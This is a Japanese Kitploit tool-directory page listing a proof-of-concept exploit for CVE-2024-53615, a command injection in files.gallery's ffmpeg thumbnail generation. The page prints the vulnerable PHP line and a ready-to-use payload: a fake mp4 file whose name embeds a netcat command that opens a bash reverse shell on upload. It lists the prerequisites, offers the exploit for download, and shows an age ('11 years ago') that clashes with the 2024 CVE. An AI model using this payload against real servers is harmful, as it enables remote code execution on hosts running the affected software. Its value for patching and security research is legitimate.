Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-53615 — CVE-2024-53615 | Kitploit
ツール/GitHubGitHub/beune/cve-2024-53615
脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロール学習と教育
GitHubbeune/cve-2024-53615

CVE-2024-53615

CVE-2024-53615

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-53615

Karl Ward の files.gallery v0.3.0 から 0.11.0 におけるビデオサムネイルレンダリングコンポーネントのコマンドインジェクションの脆弱性により、リモートの攻撃者が細工されたビデオファイルを介して任意のコードを実行できる可能性があります。 前提条件:

  • ffmpeg が PATH に存在すること
  • config.php で 'allow_upload' => true に設定されていること
  • PHP 設定で exec が有効であること

この脆弱性は、ビデオプレビューを生成する次の行(バージョン 0.9.12 から取得)に存在します:

root@kitploit:~
$cmd = $ffmpeg_path . ' -ss 3 -t 1 -hide_banner -i "' . str_replace('"', '\"', $this->path) . '" -frames:v 1 -an -vf "thumbnail,scale=480:320:force_original_aspect_ratio=increase,crop=480:320" -r 1 -y -f mjpeg "' . $cache . '" 2>&1';

$this->path はユーザーが制御可能であるため、タイトルが bash コマンド置換となる悪意のあるファイルを構築できます。このファイルには、例えば mp4 マジックバイトが含まれ、ファイル名が .mp4 で終わることが重要です:

root@kitploit:~
$ echo "AAAAIGZ0eXBpc29tAAACAGlzb21pc28yYXZjMW1wNDEAAQv7bW9vdgAAAGxtdmhk" | base64 -d > '$(nc 127.0.0.1 8443 -e bash).mp4'

このファイルをアップロードし、ページを更新してアプリケーションにファイルを読み込ませると、ローカルマシン上でシェルを取得できます。

注:コマンドはファイル名に保存されるため、リバースシェルの可能性はファイル名の長さの制約により制限されます。

免責事項

このリポジトリは、教育および研究目的のみを意図しています。

誤用に関する警告: このツールを不正または悪意のある活動に使用することは固く禁止されており、地域、州、または国際法に違反する可能性があります。作者はこのコードの誤用について一切責任を負いません。

このツールをどのような環境でも展開する前に、必ず適切な許可を取得してください。このプロジェクトを使用することで、責任を持って倫理的に使用することに同意したものとみなされます。

ツールをダウンロード